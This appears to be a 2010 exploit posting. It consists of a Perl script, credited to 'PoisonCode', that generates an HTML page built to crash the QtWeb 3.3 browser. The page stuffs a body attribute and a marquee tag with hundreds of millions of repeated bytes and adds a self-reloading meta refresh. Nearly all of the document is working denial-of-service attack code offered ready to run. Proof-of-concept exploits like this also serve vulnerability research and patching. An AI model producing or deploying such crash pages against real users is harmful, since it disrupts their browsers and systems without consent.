|
# Title:QtWeb 3.3 Remote DoS/Crash Exploit # Software Link:http://www.qtweb.net/downloads/QtWeb-setup.exe # Portable: http://www.qtweb.net/downloads/QtWeb.exe # Version: 3.3 # Platform:Windows _____ _____ _ _ | __ \ / ____| (_) | | |__) | (___ ___ ___ _ _ _ __ _| |_ _ _ | ___/ \___ \ / _ \/ __| | | | '__| | __| | | | | | ____) | __/ (__| |_| | | | | |_| |_| | |_| |_____/ \___|\___|\__,_|_| |_|\__|\__, | __/ | |___/ Exploit ---------------- #!/usr/bin/perl # File Name :QtWeb 3.3 Remote DoS/Crash Exploit # Vuln :Remote Dos/Crash # Author :PoisonCode # Exploit Title: QtWeb 3.3 Remote DoS/Crash Exploit # Date:02/06/2010 # Author:PoisonCode # Site :http://www.qtweb.net/ # Software Link: http://www.qtweb.net/downloads/QtWeb-setup.exe # Portable:http://www.qtweb.net/downloads/QtWeb.exe # Version: 3.3 # Tested on: Windows $file="Exploit QtWeb 3.3.html"; print " ======================================\n"; print " = QtWeb 3.3 Remote DoS/Crash Exploit =\n"; print " = Autor:PoisonCode =\n"; print " = Web :PanamaSecurity.blogspot.com =\n"; print " ======================================\n"; print "\n"; print " Espere Mientras se Genera el Exploit\n"; my $a="\x55" x 100000000; my $b="\85" x 55900000; my $c="\x7C\x95\x64\xAE\x00\x96\xbd\x40\x00\x09\8a\86\x5A\x65\x72\x30\x0\x54\x68\x75\x6E\x64\x65\x72"; open(myfile,">>$file"); print myfile "<html>"; print myfile "<title>PanamaSecurity - PoisonCode $c </title>"; print myfile '<head><meta http-equiv="refresh" content="0; url=Exploit QtWeb3.3.html"></head>'; print myfile "<body alink="; print myfile $a,$b,$c; print myfile "<marquee>$a,$b,$c</marquee>"; print myfile '">'; print myfile "</html>"; close(myfile); print "\n"; print " Nombre del Archivo : $file\n"; print " Se Ha Creado El Exploit Correctamente \n"; print "\n"; print "----------------------------------------------------------------------\n"; print " Visiten : PanamaSecurity.blogspot.com\n";
|